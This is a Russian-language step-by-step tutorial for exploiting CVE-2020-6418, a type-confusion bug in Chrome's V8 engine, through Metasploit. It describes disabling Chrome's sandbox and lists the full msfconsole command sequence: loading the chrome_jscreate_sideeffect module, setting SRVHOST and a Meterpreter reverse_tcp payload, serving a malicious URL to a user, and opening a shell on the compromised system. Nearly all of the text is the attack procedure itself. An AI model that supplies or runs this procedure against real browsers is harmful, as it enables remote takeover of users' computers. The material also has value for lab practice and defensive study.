
Эксплойт для CVE-2020-6418, путаницы типов в V8, позволяющий удаленное выполнение кода через специально созданную HTML-страницу. Использует Metasploit для доставки полезной нагрузки reverse shell.
CVE-2020-6418 касается путаницы типов (type confusion) в V8 в Google Chrome. Затрагиваемые версии — до 80.0.3987.122. Уязвимость позволяет удаленному злоумышленнику получить доступ к оболочке целевого устройства через специально созданную HTML-страницу.
Примечание: Браузер Google Chrome должен запускаться без песочницы для успешной эксплуатации.
i) Создайте ярлык для Google Chrome
ii) Нажмите «Свойства» > перейдите к параметру «Объект»
iii) В конце строки EXE поставьте пробел и введите -no--sandbox
iv) Нажмите «Применить» > «ОК»
v) Откройте новый браузер Google Chrome, и вы увидите всплывающее окно с сообщением ниже.
Вы используете неподдерживаемый флаг командной строки: -no-sandbox. Стабильность и безопасность пострадают.
Поскольку мы используем Kali в качестве среды для проведения атаки, Metasploit входит в состав дистрибутива. Но если вы используете другие дистрибутивы, необходимо настроить Metasploit перед началом эксплуатации.
Для дальнейшего понимания обратитесь к Установке Metasploit.
i) Запуск Metasploit Framework
> msfconsole
ii) Поиск эксплойта
> search chrome_js
iii) Используйте доступный эксплойт из вывода выше
> Use exploit/multi/browser/chrome_jscreate_sideeffect
iv) Укажите IP-адрес SRVHOST
> set SRVHOST <IP-адрес>
v) Укажите цель Здесь у нас два варианта:
> set Target "Номер"
vi) Укажите полезную нагрузку
> set PAYLOAD windows/x64/meterpreter/reverse_tcp
vii) Для проверки текущих настроек и включенных параметров.
> show options
viii) Для запуска эксплойта
> run (или) > exploit
ix) Вы получите URL, который необходимо скопировать в браузер, чтобы сессия стала активной.
x) Как только пользователь перейдет по URL, будет создана сессия. Чтобы проверить это:
> show sessions
xi) Используя сессию, мы можем проверить информацию о системе пользователя / войти в оболочку.
> sessions <номер>
> shell